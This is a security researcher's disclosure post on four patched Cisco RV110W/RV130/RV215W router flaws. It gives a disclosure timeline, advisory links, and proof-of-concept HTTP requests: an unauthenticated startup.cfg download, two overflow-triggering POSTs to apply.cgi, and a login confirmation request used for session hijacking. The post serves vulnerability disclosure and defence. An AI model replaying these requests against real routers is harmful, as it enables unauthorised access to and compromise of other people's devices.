More than a year ago now, Pentest Partners published an article explaining CVE-2019-1663, a stack buffer overflow affecting multiple low end devices from Cisco (RV110, RV130, RV215). I then went on writing exploit modules for each affected device and version, as detailed in my “Exploiting CVE-2019-1663” post.
During the analysis I found other issues that I reported to Cisco PSIRT. These issues are now fixed.
TL;DR; Cisco RV110W, RV130(W), and RV215W VPN routers are affected by authentication bypass, authenticated remote command execution, and information disclosure issues. By chaining them an unauthenticated remote attacker can fully compromise your device. Patch now.
Coordinated Disclosure Timeline
- 4 Nov 2019 - Initial report to Cisco PSIRT
- 5 Nov 2019 - Cisco assigned case handler and start looking at the report
- 17 Jan 2020 - PSIRT provides tentative fix release date (March 2020)
- At this point COVID-19 happens and makes everything slower but Cisco folks kept me informed along the way
- 5 Jun 2020 - CVE identifiers are assigned, tenative fix release date is set to July 2020
- 15 Jul 2020 - Release of fixed firmwares and security advisories
Cisco Security Advisories
You can find Cisco advisories at the following locations:
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-rce-m4FEEGWX (CVE-2020-3145/CVE-2020-3146)
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-auth-bypass-cGv9EruZ (CVE-2020-3144)
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-info-dis-FEWBWgsD (CVE-2020-3150)
Detailed advisories with proof-of-concepts follows. As always, if you have any question just get in touch on Twitter or by email.
CVE-2020-3150 - Cisco RV110W/RV130/RV130/RV215W Routers Unauthenticated Configuration Export
Summary
A vulnerability in the web-based management interface of Cisco RV110W/RV130W/RV215W Wireless-N Multifunction VPN Routers could allow an unauthenticated, remote attacker to retrieve sensitive information.
Impact
A successful exploit could allow the attacker to download the router configuration or detailed diagnostic information.
Note that to be able to download the file, an administrator user must have open the page backup.asp on the device since the latest reboot. Once the page is accessed, a flag is set by the httpd binary, allowing for generation of the startup.cfg file download (saved in /tmp/config.txt).
Affected Systems
- RV110W Wireless-N Multifunction VPN Router up to version 1.2.2.4 included
- RV130 Multifunction VPN Router up to version 1.0.3.51 included
- RV130W Wireless-N Multifunction VPN Router up to version 1.0.3.51 included
- RV215W Wireless-N Multifunction VPN Router up to version 1.3.1.4 included
Description
The vulnerability is due to improper access controls for URLs. An attacker could exploit this vulnerability by connecting to an affected device via HTTP or HTTPS and requesting specific URLs.
Here we show that an early version of the RV215W is affected:
GET /startup.cfg HTTP/1.1
Host: 192.168.1.1
Connection: close
HTTP/1.1 200 Ok
Server: httpd
Date: Fri, 01 Jan 2010 00:01:46 GMT
Content-Disposition: attachment; filename=RV215W_startup.cfg
Content-Type: application/octet-stream
Connection: close
;RV215W Configuration File - Version: 1.1.0.5
;MAC address: 10:BD:18:AC:57:3A
;Serial Number: CCQ231407B9
;The checksum: 8A41D8E444067386
--snip--
Other files are also affected, but it depends on the setup, such as mirror.cfg or backup.cfg
CVE-2020-3145 - Cisco RV130/RV130W Routers Management Interface Remote Command Execution (IPSEC)
Summary
A vulnerability in the web-based management interface of the Cisco RV130W Wireless-N Multifunction VPN Router could allow an authenticated, remote attacker to execute arbitrary code on an affected device.
Impact
A successful exploit could allow the attacker to execute arbitrary code on the underlying operating system of the affected device as a high-privilege user.
Affected Systems
- RV130 Multifunction VPN Router up to version 1.0.3.51 included
- RV130W Wireless-N Multifunction VPN Router up to version 1.0.3.51 included
Description
The vulnerability is due to improper validation of user-supplied data in the web-based management interface. An attacker could exploit this vulnerability by sending malicious HTTP requests to a targeted device.
We identified multiple dangerous calls to strcpy in the function at 0x00071cac in the httpd binary (/usr/sbin/httpd in firmware rootfs).
The decompiled function looks like the pseudo-code below, comments are personal additions:
It is possible to trigger one of the stack buffer overflow above with an authenticated request such as the one below:
POST /apply.cgi;session_id=b37f0e917e54a1af0e1d7a0027d9de5d HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.1/apply.cgi;session_id=79f76000d1a3c29cef38c6dd14f25c0e
Content-Type: application/x-www-form-urlencoded
Content-Length: 1812
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
submit_button=vpn_adv_refresh&change_action=&submit_type=&gui_action=Apply&ipsec_enc=aes
128&ipsec_int=sha1&backname=&stflg=add&selidx=0&ipsec_stflg=add&ipsec_selidx=0&ike_stflg
=&ike_selidx=&next_page=vpn_adv&ipsec_policy_name=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&ipsec_policy_type=0&ipsec_en
dpoint_type=0&ipsec_endpoint_value=1.1.1.1&ipsec_local_type=0&ipsec_local_start=1.1.1.1&
ipsec_local_subnet=255.255.255.255&ipsec_remote_type=0&ipsec_remote_start=1.1.1.1&ipsec_
remote_subnet=255.255.255.255&start_auto=&ipsec_sa_lifetime=3600&auto_ipsec_enc=aes128&a
uto_ipsec_int=sha1&ipsec_ike_policy_name=1&end_auto=&webpage_end=
CVE-2020-3146 - Cisco RV130/RV130W Routers Management Interface Remote Command Execution (PPP)
Summary
A vulnerability in the web-based management interface of the Cisco RV130W Wireless-N Multifunction VPN Router could allow an authenticated, remote attacker to execute arbitrary code on an affected device.
Impact
A successful exploit could allow the attacker to execute arbitrary code on the underlying operating system of the affected device as a high-privilege user.
Affected Systems
- RV130 Multifunction VPN Router up to version 1.0.3.51 included
- RV130W Wireless-N Multifunction VPN Router up to version 1.0.3.51 included
Description
The vulnerability is due to improper validation of user-supplied data in the web-based management interface.
An attacker could exploit this vulnerability by sending malicious HTTP requests to a targeted device.
We identified a dangerous call to strcpy in the function at 0x0006e994 in the httpd binary (/usr/sbin/httpd in firmware rootfs).
The decompiled function looks like the pseudo-code below, comments are personal additions:
It is possible to trigger one of the stack buffer overflow above with an authenticated request such as the one below:
POST /apply.cgi;session_id=b37f0e917e54a1af0e1d7a0027d9de5d HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.1/apply.cgi;session_id=79f76000d1a3c29cef38c6dd14f25c0e
Content-Type: application/x-www-form-urlencoded
Content-Length: 1812
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
submit_button=wan&change_action=&submit_type=&ppp_passwd=dGVzdA==&wizard_pppoe_pname=AAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&gui_action=Apply&pppoe_select
_profile=0&wait_time=20&chg_flg=0wantag_enable=0&lan_ipaddr=192.168.1.1&wan_proto=pppoe&
ppp_demand=&_pppoe_select_profile=0&mtu_enable=0&webpage_end=
CVE-2020-3144 - Cisco RV110W/RV130/RV130/RV215W Routers Authentication Bypass
Summary
A vulnerability in the web-based management interface of the Cisco RV110W/RV130W/RV215W Wireless-N Multifunction VPN Routers could allow an unauthenticated, remote attacker to gain unauthorized access to the web-based management interface.
Impact
An unauthenticated user can gain unauthorized access to the router’s web-based management interface.
Affected Systems
- RV110W Wireless-N Multifunction VPN Router up to version 1.2.2.4 included
- RV130 Multifunction VPN Router up to version 1.0.3.51 included
- RV130W Wireless-N Multifunction VPN Router up to version 1.0.3.51 included
- RV215W Wireless-N Multifunction VPN Router up to version 1.3.1.4 included
Description
When an administrator logs into the device administrative interface and that a session is already opened, the UI displays a message asking if the user wants to disconnects the already opened session. When the admin clicks “OK”, the following request is sent:
POST /login.cgi HTTP/1.1
Host: 192.168.1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 1812
Connection: close
submit_button=login&submit_type=continue&gui_action=gozilla_cgi
The server then proceeds and provides a valid session to the end user.
A malicious attacker can take advantage of the fact that the confirmation requests is neither authenticated nor bound to the legitimate administrator’s source IP to hijack its session.
By constantly sending confirmation requests in a loop, if a request happens to be received between an administrator authentication request and authentication confirmation, the attacker will successfully hijack that session.
The Python script below is a proof of concept demonstrating the issue. Run it in the background and try to authenticate twice on the device’s web administration interface to see how the session is successfully hijacked.